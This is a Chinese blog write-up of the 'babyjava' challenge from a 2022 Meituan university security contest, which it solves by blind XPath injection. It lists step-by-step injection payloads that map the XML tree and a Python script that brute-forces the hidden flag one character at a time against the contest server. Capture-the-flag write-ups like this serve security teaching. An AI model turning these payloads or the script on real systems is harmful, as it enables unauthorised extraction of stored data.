您当前的位置: 首页 >  网络

葫芦娃42

暂无认证

  • 4浏览

    0关注

    75博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

2022美团网络安全高校挑战赛(初赛)babyjava(XPath注入)

葫芦娃42 发布时间:2022-09-18 11:15:22 ,浏览量:4

 有一个输入框,测试需要带着user1,

构造注入:user1' and 1=1 and ''=' 回显为:user1

user1' and 1=2 and ''='  回显为:This information is not available

 证实存在Xpath盲注

xpath=user1' and count(/*)=1 and ''='   #通过判断得知根节点有一个

payload = user1' and string-length(name(/*))=4 and ''='" #测试得出根结点长度为4

通过回显得出根节点名称为root : xpath=user1' and substring(name(/*),1,1)='r' and ''=' # 盲注得到结点名为root

通过回显判断/root下的子节点个数

xpath=user1' and count(/root/*)=1 and ''=' #通过判断得知/root只有一个子结点

payload =user1' and string-length(name(/root/*))=4 and ''='" #得到/root/下结点名长度为4

xpath=user1' and substring(name(/root/*),1,1)='r' and ''=' # 盲注得到结点名为user

通过回显判断/root/user下的子节点个数

xpath=user1' and count(/root/user/*)=2 and ''=' #通过判断得知/root/user下有两个子结点

 xpath=user1' and string-length(name(/root/user/*[1]))=8 and ''='

xpath=user1' and string-length(name(/root/user/*[2]))=8 and ''='

得出两个结点名称长度都为8

xpath=user1' and substring(name(/root/user/*[1]),1,1)='a' and ''='

xpath=user1' and substring(name(/root/user/*[2]),1,1)='a' and ''='

得到两个结点都叫username

读取两个username的内容

xpath=user1' and count(/root/user/username[1]/*)=0 and ''=' #username下面没有结点,应该是文本 xpath=user1' and substring(/root/user/username[1]/text(),1,1)='a' and ''=' #测username[1]

盲注得出,username[1]为user1

username[2]即为我们要的flag

最后附上拿flag的python脚本,其中payload可以更改

import requests
import string
import re
url = "http://eci-2zef43pmhep3r5ym8ggc.cloudeci1.ichunqiu.com:8888/hello"

s = requests.session()

strs = string.printable

flag = ''
for i in range(1,100):
    for j in strs:
        payload = "user1' and substring(/root/user/username[2]/text(),{},1)='{}' and ''='".format(i,j)
        data = {
            "xpath": payload
        }
        r = s.post(url,data=data)
        txt = re.findall('

(.+?)

',r.text) #print(txt) if "user1" in txt: flag += j print(flag) break else: continue

关注
打赏
1658420143
查看更多评论
立即登录/注册

微信扫码登录

0.0924s